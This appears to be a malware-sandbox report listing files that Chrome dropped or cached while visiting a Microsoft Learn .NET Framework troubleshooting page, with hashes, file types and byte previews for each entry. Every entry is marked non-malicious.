File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 11:02:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.97796333360051
Encrypted:	false
SSDEEP:	48:82dBTpldHOidAKZdA1hehBiZUk1W1qehHy+C:84Pz9ny
MD5:	8A858B79C783524FD4342201AEAA6864
SHA1:	721B27306C14EB62484E25DE32B36B5FA5D6BF10
SHA-256:	7A4E7E32FC267B12278B89C2211B3B7E26A9E05A1DE0B2C301CF49902DB5B29B
SHA-512:	34472A52CDC1C5CEBE2B0BDC8BEA3B8642570A6B29A7AAB47DE3058797B9C89A999BDE55BC31BF1FBE1907E205A3C67838CEA9D028666B71F1F2210DE939F725
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....v....W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YC`....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YC`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YC`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YC`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YE`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........E..;.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 11:02:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9858322701097264
Encrypted:	false
SSDEEP:	48:80dBTpldHOidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxy+yT+:8+PjT/TbxWOvTbxy7T
MD5:	F88B458A67F95501E7C89C7A0125EB72
SHA1:	F2F785FDFEA64EBFD6664C5DD8ED511102FAA13F
SHA-256:	7731155CBEA1D44DA41172AF19C4F8BC7377988B2DB315963B0E963B675FD17F
SHA-512:	89674AF6B59B675DD3F7E80328DCB0E871103EFCAEEE1DB55688F3188B0E2CA67E6F2B6419C2EE195BFCF0D32C1C03AC0374C54A306CE46857D326A86ED7211D
Malicious:	false
Preview:	L..................F.@.. ...$+.,....A....W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YC`....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YC`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YC`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YC`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YE`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........E..;.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 100

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://learn.microsoft.com/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	dropped
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
Category:	downloaded
Size (bytes):	19696
Entropy (8bit):	7.9898910353479335
Encrypted:	false
SSDEEP:	384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
MD5:	4D0BFEA9EBDA0657CEE433600ED087B6
SHA1:	F13C690B170D5BA6BE45DEDC576776CA79718D98
SHA-256:	67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
SHA-512:	9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/docons.6a251ae.34a85e0c.woff2
Preview:	wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t..........3..C..?u....E.S$.:.....mfZ......... .Q...].y..@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V...=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.\|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......\|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.\|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.\|49.......]

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	dropped
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	downloaded
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/logos/logo_net.svg
